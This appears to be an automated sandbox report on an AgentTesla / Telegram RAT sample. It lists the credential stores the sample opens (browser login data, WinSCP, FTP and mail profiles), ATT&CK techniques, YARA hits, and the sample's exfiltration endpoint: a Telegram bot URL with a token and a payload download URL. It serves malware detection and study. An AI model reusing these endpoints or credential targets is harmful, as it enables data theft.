Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Queries volume information: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.LisectAVT_2403002A_127.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5020, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.LisectAVT_2403002A_127.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5020, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.LisectAVT_2403002A_127.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5020, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.LisectAVT_2403002A_127.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5020, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.LisectAVT_2403002A_127.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5020, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	111 Security Software Discovery	Distributed Component Object Model	21 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	1 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LisectAVT_2403002A_127.exe	100%	Avira	TR/Spy.AgentTesla.kjtmf
LisectAVT_2403002A_127.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://api.ipify.org/	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
https://api.ipify.org/t	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.gnu.org/licenses/why-not-lgpl.html	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/	0%	Avira URL Cloud	safe
https://fsf.org/	0%	Avira URL Cloud	safe
http://api.telegram.org	0%	Avira URL Cloud	safe
https://download.alegsoftware.ga/ws_switches/contatore/ltromatic.ttf	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.13.205	true	false		unknown
api.telegram.org	149.154.167.220	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org	LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000325A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003668000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000031EE000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000334B000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000341E000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003309000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003351000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.gnu.org/licenses/	LisectAVT_2403002A_127.exe	false		unknown
https://fsf.org/	LisectAVT_2403002A_127.exe	false	Avira URL Cloud: safe	unknown
https://www.gnu.org/licenses/why-not-lgpl.html	LisectAVT_2403002A_127.exe	false	Avira URL Cloud: safe	unknown
https://api.ipify.org/t	LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://api.telegram.org	LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003668000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000334B000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000341E000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003351000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/	LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://download.alegsoftware.ga/ws_switches/contatore/ltromatic.ttf	LisectAVT_2403002A_127.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	true
104.26.13.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482510
Start date and time:	2024-07-25 23:58:18 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LisectAVT_2403002A_127.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@4/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 114 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: LisectAVT_2403002A_127.exe

Simulations

Behavior and APIs

Time	Type	Description
17:59:08	API Interceptor	11538794x Sleep call for process: LisectAVT_2403002A_127.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	LisectAVT_2403002A_74.exe	Get hash	malicious	AgentTesla	Browse
	New Order.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	LisectAVT_2403002B_4.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse
	Lisect_AVT_24003_G1B_33.exe	Get hash	malicious	Unknown	Browse
104.26.13.205	SecuriteInfo.com.Win64.Evo-gen.28044.10443.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	vstdlib_s64.dll.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	golang-modules.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	242764.exe	Get hash	malicious	Ficker Stealer, Rusty Stealer	Browse	api.ipify.org/?format=wef
	Ransom.exe	Get hash	malicious	Targeted Ransomware, TrojanRansom	Browse	api.ipify.org/
	ld.exe	Get hash	malicious	Targeted Ransomware, TrojanRansom	Browse	api.ipify.org/
	ReturnLegend.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exe	Get hash	malicious	PureLog Stealer, Targeted Ransomware	Browse	api.ipify.org/
	Sky-Beta-Setup.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	LisectAVT_2403002A_133.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	LisectAVT_2403002A_2.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	LisectAVT_2403002A_460.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	LisectAVT_2403002A_481.exe	Get hash	malicious	Luna Grabber, Luna Logger	Browse	104.26.12.205
	LisectAVT_2403002A_63.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	LisectAVT_2403002A_59.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	LisectAVT_2403002A_74.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	SWIFT COPY.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Re_ Q22689 - 07.24.2024_Conduit Construction Network Ltd_Today.eml	Get hash	malicious	Unknown	Browse	172.67.74.152
	LisectAVT_2403002B_385.exe	Get hash	malicious	AgentTesla, Bdaejec	Browse	104.26.12.205
api.telegram.org	LisectAVT_2403002A_74.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	New Order.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	LisectAVT_2403002B_4.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_33.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	LisectAVT_2403002A_138.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	LisectAVT_2403002A_425.dll	Get hash	malicious	Unknown	Browse	149.154.167.99
	LisectAVT_2403002A_425.dll	Get hash	malicious	Unknown	Browse	149.154.167.99
	LisectAVT_2403002A_74.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	New Order.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	LisectAVT_2403002B_181.exe	Get hash	malicious	PrivateLoader	Browse	149.154.167.99
	LisectAVT_2403002B_272.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
	LisectAVT_2403002B_344.exe	Get hash	malicious	Bdaejec, Vidar	Browse	149.154.167.99
	LisectAVT_2403002B_4.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	LisectAVT_2403002A_133.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	LisectAVT_2403002A_147.exe	Get hash	malicious	Blank Grabber	Browse	162.159.138.232
	LisectAVT_2403002A_155.exe	Get hash	malicious	Unknown	Browse	172.67.202.72
	LisectAVT_2403002A_161.exe	Get hash	malicious	Luna Grabber, Luna Logger	Browse	162.159.133.233
	LisectAVT_2403002A_162.exe	Get hash	malicious	Unknown	Browse	104.21.85.44
	https://aecoa.racipens.su/ievqefkwtdjogsyjfdbfnprzYkzLoDtSZBZFTQIDNBMGDEMRMWVOLGXOOCCPHOBAHWORBTIQHFOUAGEIrstXEZnKMUIf12KAT7V5Wwx35	Get hash	malicious	Unknown	Browse	172.67.170.95
	LisectAVT_2403002A_2.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://taf7.rphortan.com/xV5YqZuT/#Xjeffrey.laws@99restaurants.com	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	104.17.25.14
	LisectAVT_2403002A_210.exe	Get hash	malicious	Python Stealer, Empyrean, Discord Token Stealer	Browse	104.16.123.96
	Jeffrey.laws Replay VM (01m27sec).docx	Get hash	malicious	HTMLPhisher	Browse	172.64.151.101

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	LisectAVT_2403002A_133.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 104.26.13.205
	LisectAVT_2403002A_14.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
	LisectAVT_2403002A_14.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
	LisectAVT_2403002A_155.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
	LisectAVT_2403002A_162.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
	LisectAVT_2403002A_2.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 104.26.13.205
	LisectAVT_2403002A_220.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
	LisectAVT_2403002A_308.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
	LisectAVT_2403002A_308.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
	LisectAVT_2403002A_333.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205

Process:	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
